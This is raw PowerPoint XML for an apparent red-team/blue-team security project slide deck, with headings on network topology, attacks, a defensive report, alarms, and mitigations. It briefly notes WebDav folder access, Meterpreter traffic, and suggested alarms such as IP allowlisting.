                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D76B2F7-4F50-4773-9D4F-290F710032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66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{129C72A8-9B1F-4E7C-849C-3ED6C4F65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64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B4AD277-5CD3-42C3-8B43-2D645DF11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66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B705E15-6BC1-424E-9A76-D1005A391C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64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F76BC37-F98D-4577-97A0-F827D0D17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66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BD26941-01BA-4D66-8E65-20857D3DCE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64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{449B424C-62D9-4A49-AC52-5A78F2E40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66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{576C9EBF-ED63-4269-A697-F6509920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64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD803FF3-8F07-4737-8BB1-105F778F12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66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FAED273-7CA0-4E1E-B334-37B189A6B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64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9C1E0D9-E570-4AF5-880E-BBA6DD522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66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDEDE693-1FBA-4D1A-A164-53CCD5CB0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64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AA202F9-EAD4-4DEA-9024-632A4F73B5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66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6CCC0AF-E071-40EB-8C53-5ACA30272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4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AA000E7-AF97-4611-99C3-B1E03F5A4A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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC00B1E-E93B-4433-97D2-5360B330A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4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4B77C83-19B4-4B90-ABA7-E70C365B4F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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{597565E2-2F06-489E-937B-AD74A7823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F228EE9-2816-457D-83CE-BCFA543CB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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374D8F1E-E29D-4C22-AF20-A95EB92C9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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C92B3D-579A-3B76-6BE8-4F6077461A7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6950625" y="1043447"/>
            <a:ext cx="4890276" cy="1430406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D6C80E47-971C-437F-B030-191115B01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33984"/>
            <a:ext cx="606971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433211-35C9-EC07-E7AD-358031FA6EAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1166648" y="3502955"/>
            <a:ext cx="5164703" cy="302765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57150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/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> folder was accessed 20 times during the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150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/>
          </a:p>
          <a:p>
            <a:pPr marL="57150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/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>passwd.dav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> file was requested once access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>WebDav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> was acquired. 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9" name="Picture 9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FA027800-D724-C001-5454-E5DE226E3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0625" y="3932868"/>
            <a:ext cx="4890276" cy="221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842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8FC8FA6-C3F8-4424-827D-CD12A91F0047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5408645" y="889519"/>
            <a:ext cx="777550" cy="77755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DD031F4-D36E-40F3-B415-6B06DACD8048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5408645" y="1968759"/>
            <a:ext cx="777550" cy="7775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6A60371-D18A-48F2-BA2B-023354E38989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5408645" y="3047999"/>
            <a:ext cx="777550" cy="77755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59AF6D9-344D-4C6C-8C08-4722A83274D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5408645" y="4127239"/>
            <a:ext cx="777550" cy="77755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A5A5ECB-5FD7-4BA2-AE68-7C7DCFBBC428}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5408645" y="5206479"/>
            <a:ext cx="777550" cy="77755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Bug under magnifying glass with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EDD3018-2F74-4AB9-A27E-DE6EF9D4E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523754" y="3151907"/>
            <a:ext cx="549658" cy="549658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 9" descr="Glasses with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F45370-0F2D-4FA5-A72B-AC4614D7E8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523754" y="2072667"/>
            <a:ext cx="549658" cy="549658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Graphic 11" descr="Server outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFC46486-A355-4B1F-ADD5-EE821B6D1A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5524463" y="1040383"/>
            <a:ext cx="549658" cy="549658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Graphic 13" descr="Siren with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77FE8262-0C8B-4336-95D8-58DEC48628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5527125" y="4216990"/>
            <a:ext cx="549658" cy="549658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Graphic 15" descr="Lock with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C6D2A8-B634-4E6C-9BA2-1B58C6F5793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5518578" y="5274263"/>
            <a:ext cx="549658" cy="549658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44B806A-BD80-4AFA-A420-925D20D06DFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6536748" y="1231446"/>
            <a:ext cx="2592355" cy="9525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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F9A8687-766D-4B45-9DA5-B02C36D7BD8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="592532" y="2327436"/>
            <a:ext cx="4335430" cy="9525"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="accent6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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFC8F74D-AC81-4215-9E0D-A5F8112022EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6576076" y="3419475"/>
            <a:ext cx="3116230" cy="9525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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0486410F-F017-46BB-8C78-38B5E0D78C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3264138" y="4515114"/>
            <a:ext cx="1658905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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6DB4B17-ACD4-4CB0-9A2B-D7D1FD4DAFFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6567165" y="5538634"/>
            <a:ext cx="1877980" cy="1905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177259B6-284B-4544-9715-7550AF1CB7F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598199" y="850190"/>
            <a:ext cx="4331713" cy="11185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spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Barlow ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>01 – Network Topology</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" cap="all">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Barlow ExtraBold" panose="00000900000000000000" pitchFamily="2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6D73A41C-B2D4-4F2B-BA1D-835104963FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6567165" y="3105149"/>
            <a:ext cx="4331713" cy="11185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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1400">
                <a:latin typeface="Barlow ExtraBold"/>
              </a:rPr>
              <a:t>03 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1400" cap="all">
                <a:latin typeface="Barlow ExtraBold"/>
              </a:rPr>
              <a:t>Blue team: Defensive report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934D7FF-8D3B-4137-A8CE-714559BC6401}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570852" y="5206479"/>
            <a:ext cx="4331713" cy="11185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spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Barlow ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>05 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" cap="all">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Barlow ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Mitigations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6DD9F19-DE9A-4E62-87AC-608CF7A149EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588728" y="2021929"/>
            <a:ext cx="4331713" cy="40813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r">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Barlow ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>02 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1500" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Barlow ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Red Team: Offensive Security Attacks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6EBE5E6-9784-47C7-868C-90C49269A008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588728" y="4165339"/>
            <a:ext cx="4331713" cy="48647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r">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Barlow ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>04 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Barlow ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Alarms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737011-F4EC-A3F3-2FA7-DABB04E87EF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781050" y="323850"/>
            <a:ext cx="318135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3436708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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23CBEF12-C9B8-466E-A7FE-B00B9ADF4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3E6C67-26D8-31C9-F4D8-AE19D64A3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4" y="374878"/>
            <a:ext cx="4821639" cy="185188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b="1">
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>Identify the Meterpreter Traffic</a:t>
            </a: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A83EA935-8B7A-9F8B-6714-E7DDA0CF57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" r="224" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188940" y="2392326"/>
            <a:ext cx="6298971" cy="3917209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0144E83-DA1F-B436-6A00-F6570F0C7B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9571153"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5188941" y="370319"/>
          <a:ext cx="6298971" cy="18518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6676DE54-E0F8-52D8-F218-2CEBDA4248E8}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5457824" y="6133684"/>
              <a:ext cx="1019175" cy="1905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6676DE54-E0F8-52D8-F218-2CEBDA4248E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85823" y="6000000"/>
                <a:ext cx="1162817" cy="2860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A042584-9848-0108-BDF3-A70701420A58}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7572375" y="6124574"/>
              <a:ext cx="1009650" cy="9525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A042584-9848-0108-BDF3-A70701420A5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500334" y="5993195"/>
                <a:ext cx="1153371" cy="2719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60BC74D-456F-DBB1-85BA-2AA88C225BB4}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="9058274" y="6115049"/>
              <a:ext cx="485775" cy="9525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60BC74D-456F-DBB1-85BA-2AA88C225BB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986147" y="2305049"/>
                <a:ext cx="629668" cy="762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B8C2D87-A38C-BD84-AC2F-6E2792791408}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10172700" y="6096000"/>
              <a:ext cx="495300" cy="1905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B8C2D87-A38C-BD84-AC2F-6E279279140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100551" y="5957455"/>
                <a:ext cx="639236" cy="295795"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AF374B6-2D0F-3D96-4DB4-FC237429820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330328" y="6300751"/>
            <a:ext cx="6167609" cy="380039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 21" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8DAC84C-1061-2830-E5B4-A092567CF79B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t="8116" r="16353" b="-250"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2272977"/>
            <a:ext cx="4882612" cy="406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495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2A018-ABB9-5B13-A19C-CC0B6EDFF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34946"/>
            <a:ext cx="3689094" cy="5055904"/>
          </a:xfr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Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>Hardening:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
              </a:rPr>
              <a:t>Alarms, Thresholds, &amp; Mitigation Strategies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E32E097E-84B9-8376-E834-CADB5199A8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6428985"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4877508" y="569399"/>
          <a:ext cx="6582555" cy="51217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42412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F7D788E-2C1B-4EF4-8719-12613771F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45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308B84-A12D-5AA3-E984-26FBF0894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949" y="3499076"/>
            <a:ext cx="6053558" cy="2424774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  <a:latin typeface="Avenir Next LT Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Mitigation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Finding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Avenir Next LT Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-lt"/>
              <a:cs typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Avenir Next LT Pro"/>
              <a:cs typeface="Calibri Light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C54E824-C0F4-480B-BC88-689F50C45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199" y="548"/>
            <a:ext cx="4349752" cy="3142889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8DEA6A1-FC5C-4E6E-BBBF-7E472949B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3759" y="1421356"/>
            <a:ext cx="4538241" cy="5436644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96AAAC3B-1954-46B7-BBAC-27DFF5B52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9395" y="0"/>
            <a:ext cx="4023360" cy="2980240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 248676 w 4023360"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2980240"/>
              <a:gd name="connsiteX1" fmla="*/ 3774684 w 4023360"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2980240"/>
              <a:gd name="connsiteX2" fmla="*/ 3780561 w 4023360"/>
              <a:gd name="connsiteY2" fmla="*/ 9674 h 2980240"/>
              <a:gd name="connsiteX3" fmla="*/ 4023360 w 4023360"/>
              <a:gd name="connsiteY3" fmla="*/ 968560 h 2980240"/>
              <a:gd name="connsiteX4" fmla="*/ 2011680 w 4023360"/>
              <a:gd name="connsiteY4" fmla="*/ 2980240 h 2980240"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 4023360"/>
              <a:gd name="connsiteY5" fmla="*/ 968560 h 2980240"/>
              <a:gd name="connsiteX6" fmla="*/ 242799 w 4023360"/>
              <a:gd name="connsiteY6" fmla="*/ 9674 h 298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36D10-4EE9-18DB-A6F5-DDFA6C00FE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11870" y="690921"/>
            <a:ext cx="2878409" cy="1792281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>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What kind of alarm would detect this behavior in the future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>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>An alarm that detects IPs that are not authorized. Have an allowed/trusted IP list (whitelist).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:cs typeface="Calibri" panose="020F0502020204030204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>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Set alarm any time the hidden folder is accessed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:cs typeface="Calibri" panose="020F0502020204030204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5AD6500-BB62-4AAC-9D2F-C10DDC90C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6897" y="1584494"/>
            <a:ext cx="4375105" cy="5273507"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 2921508 w 4375105"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5273507"/>
              <a:gd name="connsiteX1" fmla="*/ 4314072 w 4375105"/>
              <a:gd name="connsiteY1" fmla="*/ 352611 h 5273507"/>
              <a:gd name="connsiteX2" fmla="*/ 4375105 w 4375105"/>
              <a:gd name="connsiteY2" fmla="*/ 389689 h 5273507"/>
              <a:gd name="connsiteX3" fmla="*/ 4375105 w 4375105"/>
              <a:gd name="connsiteY3" fmla="*/ 5273507 h 5273507"/>
              <a:gd name="connsiteX4" fmla="*/ 1193705 w 4375105"/>
              <a:gd name="connsiteY4" fmla="*/ 5273507 h 5273507"/>
              <a:gd name="connsiteX5" fmla="*/ 1063158 w 4375105"/>
              <a:gd name="connsiteY5" fmla="*/ 5175886 h 5273507"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 4375105"/>
              <a:gd name="connsiteY6" fmla="*/ 2921508 h 5273507"/>
              <a:gd name="connsiteX7" fmla="*/ 2921508 w 4375105"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 527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033D14-D7ED-D990-2BDA-01B237BE9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06476" y="3317872"/>
            <a:ext cx="3474621" cy="27804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>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What Mitigations would prevent unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
